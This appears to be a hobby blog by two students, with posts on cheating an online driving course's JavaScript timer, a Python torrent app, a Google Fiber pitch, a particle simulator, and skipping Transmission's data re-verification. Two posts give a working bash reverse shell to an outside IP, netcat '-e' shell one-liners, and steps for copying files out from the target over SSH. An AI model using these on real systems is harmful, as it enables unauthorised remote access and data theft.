So because I have a “need for speed” I had to take a drivers class online. I’m not stupid, I don’t get in accidents and I know how to drive. So I was less then thrilled for the class. I pay my 35$ 
and open up the first section, it says it is a 4 hour minimum class plus a test at the end, each section is timed like 15 – 30 min and you cant continue and click next until the timer runs out. Each section has questions, but it is more about the reading. Anyways, it’s bullshit and I’m not about to waste my time, so I opened up my javascript debugger.
I click stop to pause the stack and flow of execution.
I click step into repeatedly just getting an idea for the code. I see line 284 and it looks like if the timerval is 0 or less it displays the quiz (meaning I completed the section). I type timerval = 0 and hit enter, then step into. It entered that if statement, I clicked continue for the program execution. Answered the easy quiz question (getting it wrong does nothing) and clicked the now available next button at the bottom.
After using this technique to skip 4 potential hours of bullshit, I took the test. The test looked like it was graded server side and I was tired so I just took it without cheating. Even though I got crap questions like “What percent of fatal crashes involve drugs, 17%,18%, or 17.5%”, I still completed it with 92% and not reading a bit of their course.
I just decided to code this tonight, it uses the tkinter GUI library for the app, and hunnyb libraries for decoding the torrent file
hunnyb can be found here
http://meatballhat.com/projects/HunnyB
As for my app it is in python and the source is here.
http://pastebin.com/wscvTZBq
Here are some pictures of it in action. 
Lyrics: http://pastebin.com/1VEHNSg5
Song: http://www.youtube.com/watch?v=oUbpGmR1-QM
Background info: On his final Colby failed and asked us if the subnet mask was /63 also during labs router 7 was found to be broken.
I have been working with the concept of an autokey cipher with my own twist. Here is the same string encrypted 5 different times. Can anyone crack it?
LL 1&BGT51
2fWAI!Rx*P
yKv6lP5fua
KRN320mV3A
&z%i2@eII$
- Andrew
Because of how the reverse shell in my last post works most commands don’t work if it takes multiple lines or requires a password like scp. So to fix this lets generate a rsa public and private key. Assume you only have reverse shell access you can download this code off a webserver using curl -O
#!/usr/bin/expect
spawn ssh-keygen -t rsa
expect “Enter file in which to save the key”
send “\r”
expect “Enter passphrase”
send “\r”
expect “Enter same passphrase again:”
send “\r”
expect “Your identification has”
run that as a bash script and it will generate two keys in /Users/useraname/.ssh you want the public key id_rsa.pub
In your reverse shell navigate to the directory and type “cat id_rsa.pub” and copy what it gives you. Go onto your server and find your authorized ssh hosts. On ubuntu it is “/root/.ssh/authorized_keys” so when logged onto my server I opened that file and added the data from the cat command. Now you can do “scp file.zip root@server.com:/” and it will upload the file without asking for a password and you can do it in the reverse shell. TA DA!
On linux you might of heard of using netcat on the target, it would look something like this.
“nc 127.0.0.1 8080 -e /bin/bash”
Or on windows.
“nc 127.0.0.1 8080 -e cmd.exe”
However for unknown reasons (I assume security) apple’s modified version of netcat does not have a -e flag but there is a work around using bash. I do not take credit for this I just found it with a lucky google search.
On the target computer create a file called target.sh
the file should contain some bash code.
“#!/bin/bash
exec 5<>/dev/tcp/74.125.155.104/8080
cat <&5 | while read line; do $line 2>&5 >&5; done”
next open Terminal.app navigate to the directory the file is saved and type.
“chmod +x target.sh”
“./target.sh”
Before you do all this though you should have a open connection waiting on a server. Personally I just use an ubuntu box (you may need to install netcat on your server). From a shell on your server type
“netcat -l -p 8080 -vvv”
Here is an example below. The root@freakbox is obviously the server. I also forwarded the port 8080 to my server from my router.
Google’s fiber network is greatly needed in our community. Current ISP’s provide slow speeds for high prices (bundles that don’t save you money), and poor customer service. ISP’s are setup so they have as little competition as possible, and are able to take advantage of the consumers. When a company is hated so much it needs to change its name to xfinity, drastic measures need to be taken. This is where google can intervene to provide an alternative, and much faster option to everyone else. The introduction of a new ISP with better speeds could spark some competition and maybe help out verizon and comcast get their stuff together. The community (home and school) would benefit as well, especially those with IT/Networking Fields such as the Center For Advanced Learning (CAL) that we attend.
Current services offer somewhat limited options. The higher end internet packages are mainly available only if you get them with phone and T.V – and still are pricey. Comcast (or xfinity now) also messes with customers’ bandwidth and offers quite unreliable service. As an IT consultant and someone who works with computers more than with people, I have seen comcast demonstrate some bad practices in the professional field as well; they are rather shifty and make life harder for other companies to install/fix networking setups (in houses and very expensive condominiums). In general, America has seen a very weak growth in the speed of internet that’s available to the public. This picture demonstrates that quite well http://i36.tinypic.com/293wmrb.jpg. Considering the internet was concieved in the United States, this is very depressing to view. We need google to bring us back to life (with electric paddles).
As it is already obvious the current options presented to the people of gresham are weak at best. With google trying to move to a cloud based type of system giving the people of Gresham a taste of this Ultra High-Speed Internet would be a great start to showing them what is possible. If people are happy with their internet from google, they might be interested in checking out Chrome OS or even looking into a google phone. Something that makes Gresham a great place to test out this fiber network is the education system. In the gresham are there are four highschools, one college, and a charter school The Center For Advanced Learning. All of these schools could greatly benefit from a faster connection. Not to mention freeing the residents of Gresham from the tyranny of Xfinity/Verizon, and hopefully forcing some new internet plans to be set in place.
In the past google has provided us with projects such as gmail, andriod, chrome, and of course its search engine. We hope google can impress us one more time, and provide us with its Ultra High-Speed Internet infrastructure. This will only be another addition to the line of powerful products and services google has created, and we look forward to it.
- Andrew & Tudor
EDIT: Just a great example of Comcast’s fine customer service.
Transmission is a multi platform BitTorrent client and is great in many respects for what it does. However not all applications work how you want them to. You might of noticed that if you did not quit transmission correctly or ejected your drives early (even if the torrents are paused) when you re opened the client your data would have to re-verify. If you only have a few torrents this is not a big deal but with lets say 900 torrents and TB’s of data it can take literally 4 days to re-verify data even when you know it is there. If in the case you know you just quit something out of order and that you’re sure the data was not changed there is a way around this data verifying. As a mac user I will only be explaining the mac side. I am currently working on a program to automate it but ill explain how transmission works for now. Again I do not recommend using this all the time or your client could upload data that “does not exist” you could screw people over and get banned from private trackers but here it goes.
Resume Files
Transmission stores .resume files in /Users/YOURUSERNAME/Library/Application Support/Transmission/Resume/
there is one resume file per torrent in the client these files are encoded with Bencode (BEE-Encode) they contain data like upload/download priority file location etc.. but more importantly they contain the last time modified and the data blocks verified. In a GUI bencode editor (only one exists on windows) it looks like this. However you can still read the data on a mac its just in command line with python, here.
The important info is the bitfeild and mtimes fields under the progress. mtimes is the modified time in epoch time (this is seconds passed since january 1 1970) its a unix time thing you can read about here and convert it back and forth here. What Transmission checks is that the data file’s last modified time (in epoch) and the bitfield blocks. I believe the 41 represents how many blocks there are and each ÿ = 1 block, also ÿ == 0xff and it just means that block is downloaded. On a file that will require verification the mtime will be -1 and the bitfield blocks will just be blank. Until I get my program completed I am manually doing it with the help of windows and some nifty command line commands. The steps are as follow
Steps
- Close Transmission
- Pick a eopoc time (I just have one thats a few weeks ago 1243192648)
- Find the file that needs re-veryfing (Apples touch utility makes you format the time in a [[CC]YY]MMDDhhmm[.SS] format so I downloaded gtouch, or GNU’s version of touch because it uses epoch time)
- run “gtouch -m -d @1243192648 filename.dmg” or if its a Folder with more files within it you can do this recursively with “find . -exec gtouch -m -d @1243192648 folder_name {} \;” when in the same directory in terminal of course.
- Now to modify the resume file, currently I am using BEncode Editor in windows I changed mtime from -1 to 1243192648
- Next to change bitfield, I look at the number of blocks it should have then paste ÿ into a text editor until my char count is the same (41 in this case), then I copy that into my clipboard and paste it into the bitfield. Then save the file, or move it from your windows virtual machine to your mac and replace the old one.
- Open up Transmission and the torrent should now resume without checking.
Some things to note, if its a folder with lots of files, each file will have an mtime to edit in BEncode Editor (so it can take a long time to do by hand). That is why I’m currently working on program to automate this long process. Hopefully this is helpful to someone though and now you know just a little bit more about your torrent client.
- Andrew Free
I enjoy math and physics, so most of my programs revolve around the subjects. I’ve always been pretty fascinated by physics simulators that handle fluid particles (like water, air, etc), so I wanted to try making something similar to one. This program deals only with solid particles that bounce off of one another when they hit. However, the particles are not programmed to bounce off with different force and speed at the proper angle quite yet. I mainly created this to see how I could program collision detection between a large amount of objects. Everything for this is written in Java; I already have a few other big projects going on in C++ and other languages, and GUI is worlds easier to do in Java.
The program uses Java Swing to make a window, and sets up a thread to control the program. To make the particles I use a rectangle array, which lets me control each individual x and y point, as well as the width and height. I also create an array equal to the particle one, which sets a specific x and y speed for each particle (dx dy). By doing all this I have complete control over each particle that I make, no matter how many there are. Now the problem was how to check each one for collisions. First I set up a for loop to check collisions with the window boundary so they all stay on screen. The code for this is important because it keeps the particles within the window bounds at all times, specific to the side of the window. If it is not set up correctly, some of the particles will escape the window, especially when they start colliding. I will explain the code a little later, but at the moment I have to get back to some work. The code is available here for you to look through. I know that some of it is untidy, but I wrote it all in my free time today. Post any questions you have, and I’ll try to answer them when I finish the post.
Tudor Marcu
This post will serve as a sort of introduction to this site as well a future outlook. The site is run by myself (Andrew) and Tudor. We are both seniors in high school right now, but have been accepted to OSU for pre-engineering. There we will be studying computer science and taking some electrical engineering classes as well. The goal of this site is to basically share what we have been up to, along with sharing code that might help others. The hope is for it to be mainly security based posts, but that remains to be seen. It will also be a way to get our names out into the internet early. We will be adding contact information soon, so if you have any questions or suggestions feel free to send us an email.
- Andrew & Tudor
